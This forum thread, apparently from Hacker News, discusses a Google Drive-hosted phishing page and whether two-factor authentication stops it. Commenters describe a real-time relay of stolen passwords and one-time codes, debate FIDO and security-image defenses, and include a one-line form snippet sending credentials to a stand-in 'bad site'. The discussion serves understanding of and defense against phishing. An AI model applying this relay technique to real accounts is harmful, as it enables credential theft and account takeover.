What's to stop the attacker from going the next step and forwarding the user/pass to Google, triggering the SMS for 2FA, and then prompting me to enter it?
Now all you can hope is that Google notices the source IP or user-agent of the attacker doesn't match up with the user's usual pattern.
Practically speaking, I think the attackers just focus on the 95% (or whatever percent it is) that don't have 2FA enabled. No reason to worry about the 5% who do.
This all changes if they are targeting a specific individual, or if one day everyone has 2FA enabled.
Can't they just disable forms that have the action attribute in forms pointed at anything other than google domain? i.e. a form with action="badbadsite.com/customfile.php" would be disabled.
You did not read the parent comment. They cannot (or should not) be able to forward the login to Google's real form and trigger SMS 2FA because the real form should be protected by CSRF tokens.
No, CSRF isn't relevant. I'm an attacker and I have a server that's pretending to be a Google login form. I also have a client computer with a scripted browser pretending to be someone trying to login to Google. When you come to my page and login, I steal your data and immediately have my client program use it to login. If Google asks my client browser for a 2FA code, behind the scenes I forward that request to you and then when you answer, I forward the answer back to Google. From what Google can see, it just looks like someone logging in from a new computer.
None of this has anything to do with cross-site scripting. It's a MITM attack. CSRF doesn't come into play.
That's not what CSRF protects against and neither is it meant to. CSRF happens when you try to submit a form hosted on your site to a target site that the user has already authenticated to.
Here, the real form can be accessed from the attacker's browser, not the victim's, hence the attacker knows the CSRF tokens. CSRF doesn't protect against phishing.
I think the parent is theorizing that they could emulate someone logging in through their own headless browser to see if the credentials are valid, then if they are and the account has 2FA, they could trigger the SMS.
If you're logged into a Google Apps domain it will change the google.com to match your domain. If you're logged into a regular Google account it will remain as google.com.
1) Online service challenges the user to login with a previously registered device that matches the service's acceptance policy.
2) User unlocks the FIDO authenticator using the same method as at Registration time.
3) Device uses the user's account identifier provided by the service to select the correct key and sign the service's challenge.
4) Client device sends the signed challenge back to the service, which verifies it with the stored public key and logs in the user.
What's to stop an attacker from putting up a phishing page like this, MITM the username/password, forwarding the service's challenge back to the end-user?
I'm going to guess the trick is that the end-user browser has some way to know where the signed challenge should be POSTed for a given service, e.g. by baking that into the "account identifier" used in Step 3. So an attacker can try to MITM the account identifier, but the signed challenge would always be sent directly to the service bypassing the attacker. I'll have to check out the spec...
OK, just following up on my own curiosity here. Sorry if this is getting OT...
Every FIDO request has an AppID which is the service you are registering for, and it's an HTTPS URI.
When you resolve (HTTPS GET) the AppID, it returns a list of "FacetIDs" which are basically the different channels/endpoints which you can trust sending an authentication response. No more than one of those channels may be a 'Web Origin' facet. "In the Web case, the facetID is the Web Origin [RFC6454] of the web page triggering the FIDO operation". Examples of a non-web facets are "android:apk-key-hash:2jmj..." or "ios:bundle-id:com.acme.app"
While processing an authentication request, the FIDO client must;
o Obtain FacetID of the requesting Application. Resolve AppID URI and make sure that this FacetID is listed in TrustedApps.
- If FacetID is not in TrustedApps – reject the operation
The FIDO client will embed the FacetID it used as part of the signed response it sends back to the server.
The authentication response can optionally contain TLS channel binding information, which the server can use to try to detect MITM (although there can be false positives depending on your network). It also looks like a MITM may be able to use a specially crafted certificate to ensure channel binding information is not usable by the FIDO client.
The final step on the FIDO client in the spec is simply: "Send [xyz]Response message to FIDO Server".
So in summary, it looks like the response channel can be DYNAMIC -- I can ask your FIDO Client to send an authentication response from a different URL than the one you used when you enrolled, but the domain I ask from has to be listed in the response provided by HTTPS GET of the AppID.
The haven't found where spec says exactly how the facet ID should be matched up against the string array returned by resolving the AppID. It appears the full path is undefined and left to the control of the attacker. So a FacetID of https://www.google.com would allow an authentication response to be sent to https://www.google.com/a/domain.com/...
This is why EVERYONE should have Two-Step Verification (https://support.google.com/accounts/answer/180744?hl=en) enabled if you care a little bit about your Google Account and the data you have stored there. This kind of attack will expose your password, but the attackers wont get in your account anyway.
I don't understand how 2FA completely counters this scam.
Consider if you called someone up and told them your password, and then gave them an up-to-date number from your OTP generator.
Except instead of calling them up, you're entering it into a fake web page. Certainly the login you just made would not work when you opened up gmail in another window, but all necessary information would have been given to the attacker.
First, the scam would be randomly asking for the code or not. Cause it can't know whether the user has 2FA activated or not. So that is one way of noticing that its a scam. 2nd the code only works for 30 seconds or so.
I don't know if there's some way of login in through google api's as soon as the user enters the user and password. Also im almost sure that google requires you to enter the code via a form that is provided by them (as a google url). So im thinking something like loggin in to google using server side code and somehow using the code that the user provides to enter into google form (that will be displayed on the server side).
Im still not sure if there's any way of doing this using code. If there's no way of doing it using code then the attacker should be fast enough to use your logins and token in less than 30 seconds (or even less when the code is entered later). So it reduces the chances to get attacked a lot.
A sophisticated attack can completely imitate 2FA.
The first bit: It starts by asking for a username+pass and it uses javascript to async-post it. The evil server then tries to login to google. If google returns that a 2FA is needed it prompts for it.
I have no clue what you mean by "through google's api"... An attacker does not have to follow an api. Anything the user can do with their browser, the attacker an imitate on a remote server. Absolutely anything except source ip.
Your entire "no way of doing this using code" makes no sense at all. Posting data is something that can easily be done programmatically. Posting data through a middleman is similarly easy.
The only way that 2FA helps (edit: as alcari points out, this doesn't help much) is that the attacker can't change your password because on initiating that, I believe google asks for another 2FA code, and I don't think the attacker could reasonably expect to get you to enter two 2FA in a row.
It also does make it harder for the attacker to code it up, but it's not even that much harder.
Seven plus years ago I was investigating phishing scams that were, in real time, taking the username and password, trying it against the real server, and then prompting the user accordingly (in that case, kicking them back if they entered the wrong password). It's not that big of a leap to do the same thing to see if they have 2FA enabled.
I have it, but one thing to consider when you add Two-step is that you need a plan when you travel overseas and may not have the same sim card. Not difficult to consider, but you still need to. Being in Europe for a few weeks with no email is no fun.
The two step app works even with no connection to the internet. I dont know how but it does. I think you dont need to have the same sim card. only the phone turned on.
Google Authenticator uses TOTP (RFC 6238), which means the codes are a function of time plus a secret key. As long as your phone's clock is reasonably accurate, the app will work without any network access.
You definitely don't need network access. I use Google Authenticator on my Wifi only tablet. You need an internet connection to sync it to Google's key but not after that. And, yes, when the tablet's clock is off by a few minutes, the code doesn't work.
There's a compatible OTP app for nearly every OS. Ideally you'd be running it on a device that isn't the same as the one running your web browser, but you could just install e.g. a Windows OTP app and use that. Better than nothing.
Interesting, I hadn't come across that watch before. How do you like it? Can you compare it to something like a Pebble: size, battery life, screen quality, etc?
Agreed 100%
However, hopefully you aren't using the same password on other sites.
And hopefully you don't plan to use the same password on other sites in the future.
Right. This is MITM attack and they can defeat most of 2FA out there today.
One technique that might help is to make user choose a picture during account registration. During login show that picture, if user does not see correct picture he would suspect something.
It does not have to be picture, could be style or background of login component.
If the server just knows what picture is attached to my account, couldn't this attacker simply request the picture on my behalf and then show it to me?
Hmm that's actually a good point. I was going to suggest they should tie the picture to a browser rather than an account name, so they can only send the cookies to servers behind the login subdomain -- this would protect you from the attacker requesting the image on your behalf.
Of course the problem with that approach is when you're using different browsers, the image will be different every time.
Maybe a solution would be:
- ask user for username only
- set cookie based on username
- show image associated with account
- ask for password
That should theoretically work on every browser and protect against cross-site requests. Of course this method has its own caveats though.
Edit: never mind. I hadn't thought it through. Of course the attacker can send your username through their page and fetch the image then display it. So the only approach I can think of that would work is tying the image to a browser rather than an account.
Cookies are not arbitrarily sent to any server. If Google has a separate subdomain they use for authentication (say login.google.com), they can instruct your browser to only send the relevant cookie to that subdomain.
Good point, though it sounds like it'd very challenging to train users to notice the absence of a special image... especially when it's normal for that image to disappear whenever they use a different browser or clear cookies.
Here is how: whenever login happens from PC with not correct/current cookies, unknown IP, or whatever other indicator send an email with link to login page. Unless email is compromised link should point to real Google login.
Unless attackers compromised your email they will not be able to obtain secret picture.
Doesn't really matter if there is an API for it or not, if Google were to display it prior to you being authenticated (which they would have to for it to have any impact in this sort of attack), it would be fairly trivial for the attack code to (behind the scenes) present themselves as you to Google and then scrape the correct image from Google's response to their request. There are various things Google could do to make this more difficult, like some fancy rendering via canvas or webgl instead of just using a bog standard img tag, but to counter this the attack could just run a headless rendering browser and pixel scrape the resulting image.
Such a verification image makes the MITM attack a bit harder to code, but not really by much, and in the process might introduce an increased false sense of security.
You're both overthinking it... How would your web browser normally get the picture from Google during a legit login? Something like submit your username to a page and get a picture back? The bad guys would use exactly the same process just with the malicious server as a MITM.
I think it is important that Symantec should mention how the URL looks like. From reading this news I can only assume that this happens with hosted websites from Google Drive which have an URL like https://googledrive.com/host/someidhere This warning could be better.
Since we are talking about phishing in Google's domains, can someone explain me why http://www.blogspot.co.uk (and .ie, and .fr, etc.) leads to someone's specific blog, instead of doing like the http://www.blogspot.com site does, which leads to Google's login?
What prevents this "www" Blogger user from mounting a phishing attack?
Using something like:<form action="somebadsite.com/script.php">
So the credentials entered get submitted to the form which is sent via POST request to an external server. From there they can do whatever they want with the credentials (perhaps save them to a db) then redirect back to google docs.
AFAIK, it's not a legitimate login form. It's a attacker-created form that just looks like the login form. The trick is that they used Google Docs to host it on a .google.com server.
it wasn't actually hosted on a .google.com domain. It was googledrive.com, which is also owned by Google, but you should never expect a login form on that domain.
They use a different subdomain, but both the official login page and user docs are served from a *.google.com hostname. I'm not sure if that counts or not.
Now all you can hope is that Google notices the source IP or user-agent of the attacker doesn't match up with the user's usual pattern.